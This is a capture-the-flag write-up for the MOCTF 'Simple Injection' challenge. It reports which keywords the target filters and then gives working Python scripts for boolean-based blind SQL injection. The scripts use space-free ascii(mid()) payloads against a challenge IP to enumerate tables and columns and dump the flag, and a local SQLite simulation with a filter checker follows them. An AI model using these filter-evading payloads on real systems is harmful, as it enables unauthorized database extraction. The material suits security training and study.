MOCTF 简单注入 (Simple Injection)
"Simple injection". It really was too "simple".
Open the page and view the source:
Pass id=1, then try id=1, id=2, id=3 in turn. There are a few hints: the length of the database is greater than 20, and the flag is in this database.
Start testing for injection...
After a series of checks I found:
/**/, space, substr(), union, or, > (I only found out that > was filtered when writing the script later, ugh) and so on are all filtered.
union is filtered too, and error-based injection can't be made to work, but the ascii(), mid() and hex() functions are not filtered.
mid() does about the same as substr(), so: blind injection, run a script!!!
Honestly, writing this script made my scalp tingle; it was bumpy all the way!!!
First, the script:
import requests
import io
import sys

'''
# Probe block used while confirming the injection point.
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')  # change stdout's default encoding, otherwise s.text can't be printed
url = "http://119.23.73.3:5004/?id=1'and(length(database()))!='20"
s = requests.get(url)
s.encoding = 'utf-8'
content = s.content
# check whether the injected condition held
if 'Hello' in s.text:
    s.encoding = 'gbk'
    print(s.text)
# the SQL injection payload to build on
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20
'''
# ----------------------------- Binary search can't be used, > is filtered, damn it!!!! ----------------------------------
# ----------------------------- So whether this binary-search script is even correct is still unclear.... ----------------------------------
'''
url = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))>%s)and(length(database()))!='20"
ss = ""
for i in range(1, 30):
    minx = 31     # invariant once the first probe succeeds: minx < ascii(char) <= maxx
    maxx = 126
    payload = url % (str(i), str(minx))
    s = requests.get(payload)
    if 'Hello' not in s.text:   # ascii(char) > 31 is false: mid() ran past the end (ascii('') is 0)
        break
    while maxx - minx > 1:
        mid = (maxx + minx) // 2    # integer division; / would give a float in Python 3
        payload = url % (str(i), str(mid))
        s = requests.get(payload)
        if 'Hello' in s.text:       # ascii(char) > mid
            minx = mid
        else:
            maxx = mid
    ss += chr(maxx)                 # search ends with minx < ascii(char) <= maxx, so the answer is maxx
    print(ss)
'''
# ----------------------------- Runs too slowly, can't stand it -------------------------------
url = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)and(length(database()))!='20"
url2 = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s)and(length(database()))!='20"
url3 = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s)and(length(database()))!='20"
ss = ""
for i in range(1, 50):
    for j in range(32, 127):        # 32..126 inclusive; range(32, 126) would never test '~'
        payload = url3 % (str(i), str(j))
        # print(payload)
        s = requests.get(payload)
        if 'Hello' in s.text:       # the page contains 'Hello' only when the injected condition is true
            ss += chr(j)
            print(ss)
            break
    else:
        break                       # no printable character matched: end of the string
url enumerates the table names, url2 enumerates the column names, and url3 dumps the flag directly. Screenshot below:
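To show the whole loop end to end without the challenge server, here is an added example (not the writeup's script and not the challenge's code): a local SQLite stand-in for the vulnerable page with MySQL-style mid()/ascii()/database() shims registered, space-free equality payloads in the same shape as url and url3 above (sqlite_master standing in for information_schema.tables), a checker for the blacklist the writeup reports, and the extraction loop. The table contents, the database name and the "Hello" row are constructed; matching `or` only as a whole word is an assumption, since the writeup's own information_schema payloads contain "or" and still got through.

```python
import re
import sqlite3

# Blacklist the writeup reports: "/**/", whitespace, substr, union, or, ">".
# Assumption: "or" is matched as a whole word (a plain substring match would also
# have blocked "information_schema", which the writeup's payloads use).
FILTER = re.compile(r"/\*\*/|\s|substr|union|\bor\b|>", re.IGNORECASE)


def is_filtered(payload):
    """Return the first blacklisted token found in payload, or None if it would pass."""
    m = FILTER.search(payload)
    return m.group(0) if m else None


def make_oracle():
    """Constructed stand-in for the challenge page: returns a function that answers
    True when the injected WHERE clause still selects the row (the 'Hello' case)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no mid()/ascii()/database(); register shims with MySQL semantics.
    conn.create_function("mid", 3, lambda s, pos, n: None if s is None else s[pos - 1:pos - 1 + n])
    conn.create_function("ascii", 1, lambda c: 0 if not c else ord(c[0]))
    conn.create_function("database", 0, lambda: "constructed_db_name")  # 19 chars, so != 20
    conn.executescript("""
        CREATE TABLE do_y0u_l1ke_long_t4ble_name(d0_you_als0_l1ke_very_long_column_name TEXT);
        INSERT INTO do_y0u_l1ke_long_t4ble_name VALUES ('moctf{constructed_sample_flag}');
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'Hello');
    """)

    def oracle(user_input):
        # The vulnerable pattern: the id parameter is spliced into a quoted literal.
        sql = "SELECT title FROM news WHERE id='%s'" % user_input
        try:
            return conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False

    return oracle


# Space-free templates in the writeup's shape: parentheses replace every space, the
# comparison is "=" (no ">" allowed), and the tail closes the quote with a true condition.
TABLES_TEMPLATE = (
    "1'and(ascii(mid((select(group_concat(name))from(sqlite_master)where(type='table')),"
    "%d,1))=%d)and(length(database()))!='20"
)
FLAG_TEMPLATE = (
    "1'and(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)"
    "from(do_y0u_l1ke_long_t4ble_name)),%d,1))=%d)and(length(database()))!='20"
)
# What a binary-search version would send; kept only to show the filter rejects it.
BINARY_SEARCH_TEMPLATE = FLAG_TEMPLATE.replace(")=%d)", ")>%d)")


def extract(oracle, template, max_len=64):
    """Boolean-based blind extraction using equality tests only.

    For each position, try every printable ASCII code (32..126 inclusive) until the
    oracle answers True. A position where nothing matches means mid() ran past the end
    (ascii('') is 0 in MySQL and in the shim above), which ends the loop.
    """
    out = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = template % (pos, code)
            bad = is_filtered(payload)
            if bad is not None:
                raise ValueError("payload would be blocked, contains %r" % bad)
            if oracle(payload):
                out += chr(code)
                break
        else:
            break
    return out


if __name__ == "__main__":
    oracle = make_oracle()
    print("tables:", extract(oracle, TABLES_TEMPLATE))
    print("flag:  ", extract(oracle, FLAG_TEMPLATE))
```

Running it prints the constructed table list and flag; swapping the `=` in the template for `>` makes `extract` raise before a single request is sent, which is the same wall the writeup hit when it tried to use binary search. Against the real target, `oracle` would be the `'Hello' in requests.get(url % ...).text` check from the script, and the templates would be the MySQL ones above.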